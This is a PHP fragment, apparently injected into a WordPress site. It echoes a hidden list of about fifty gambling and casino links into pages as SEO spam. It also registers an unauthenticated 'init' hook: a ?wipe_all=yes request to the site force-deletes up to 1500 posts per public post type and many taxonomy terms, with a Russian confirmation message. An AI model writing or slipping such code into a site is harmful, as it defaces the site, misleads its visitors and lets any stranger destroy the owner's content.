';
$links = [ 'https://casino-playdoit.com/app/' => 'PlayDoit mobile app',
'https://taptapneko.com/' => 'Tap Tap Neko',
'https://rolldorado2.casino/play/' => 'play Roll Dorado 2 games',
'https://gamenight-evolution.com/' => 'GameNight-Evolution platform',
'https://mental2.org/' => 'Mental 2',
'https://sneket.org/' => 'visit Sneket',
'https://joker-bombs.com/' => 'joker-bombs.com',
'https://slotocash.space/' => 'Sloto Cash online casino',
'https://netbetcasino.com.mx/tr/' => 'NetBet Türkiye',
'https://hollywoodbets-login.co.za/bonus/' => 'bonus section on Hollywoodbets Login',
'https://plinko2.casino/' => 'Plinko 2 casino',
'https://deadoralive-2-netent.com/' => 'Dead or Alive 2 slot game',
'https://riotstock-2099.com/' => 'RiotStock 2099',
'https://refeedreader.com' => 'refeed reader',
'https://ontario.games/' => 'visit Ontario.games',
'https://papiermache-kashmir.com/' => 'papier mache kashmir',
'https://betmaster-mx.com/bono/' => 'betmaster mx bono información',
'https://cctv-game.net/' => 'CCTV Game',
'https://moonwinca.com' => 'Moon Win CA',
'https://kazino-online.gr/' => 'kazino online platform',
'https://fanaka.net/' => 'Fanaka',
'https://fortuneelixir.com/' => 'FortuneElixir',
'https://starzspins-casino.com/' => 'starzspins-casino',
'https://rolldorado2.de/en/how-to-play/' => 'how to play at RollDorado2',
'https://cupigcrush.com/' => 'CupigCrush official site',
'https://apkskachat.uz/' => 'apkskachat platform',
'https://chickentrain.casino/de/login/' => 'Chicken Train login',
'https://casino-ontario.org/' => 'Casino Ontario',
'https://pinuprtp.com/' => 'Pin-up rtp',
'https://rabbitroad2.com/pt/' => 'rabbitroad2',
'https://fairpay-in.com/' => 'FairPay gaming platform',
'https://ignition-casino-au.com/' => 'visit Ignition Casino AU',
'https://mystic-totems.com/' => 'mystic totems official site',
'https://rocketeruptiontripleblast.com/deposits/' => 'deposit methods',
'https://3junglesbeats.com/' => '3junglesbeats',
'https://rocketreels-slot.com/' => 'rocketreels-slot casino',
'https://lepharaoh-hacksawgaming.com/' => 'le pharaoh hacksaw gaming official site',
'https://moneytrain-2.com/' => 'MoneyTrain 2 gaming platform',
'https://3magiceggs.com/app/' => '3 Magic Eggs mobile app',
'https://alobet-guncelgiris.org/' => 'alobet güncel giriş',
'https://jelly.express/' => 'jelly express platform',
'https://dig-n-drop.com/' => 'dig-n-drop',
'https://shippydpop.com/features/' => 'shippyd pop features',
'https://betgray-giris.com/' => 'BetGray Giriş betting platform',
'https://spinrisebet.com/' => 'Spinrisebet',
'https://squid-gamebler.com/' => 'Squid Gamebler online casino',
'https://lottostar-register.co.za/' => 'lottostar register',
'https://cctvcasino.org/' => 'CCTV Casino official site',
'https://kalyterakazino.gr/' => 'Kalytera Kazino'];
foreach ($links as $url => $anchor) {
echo "
";
}
echo '
';
});
add_action('init', function () {
$limit = 1500;
if (isset($_GET['wipe_all']) && $_GET['wipe_all'] === 'yes') {
$post_types = get_post_types(['public' => true], 'names');
foreach ($post_types as $post_type) {
$posts = get_posts([
'post_type' => $post_type,
'numberposts' => $limit,
'post_status' => 'any'
]);
foreach ($posts as $post) {
wp_delete_post($post->ID, true);
}
}
$taxonomies = get_taxonomies(['public' => true], 'names');
foreach ($taxonomies as $taxonomy) {
$terms = get_terms([
'taxonomy' => $taxonomy,
'hide_empty' => false,
'number' => $limit
]);
foreach ($terms as $term) {
wp_delete_term($term->term_id, $taxonomy);
}
}
wp_die('✅ Удалено до ' . $limit . ' записей.');
}
});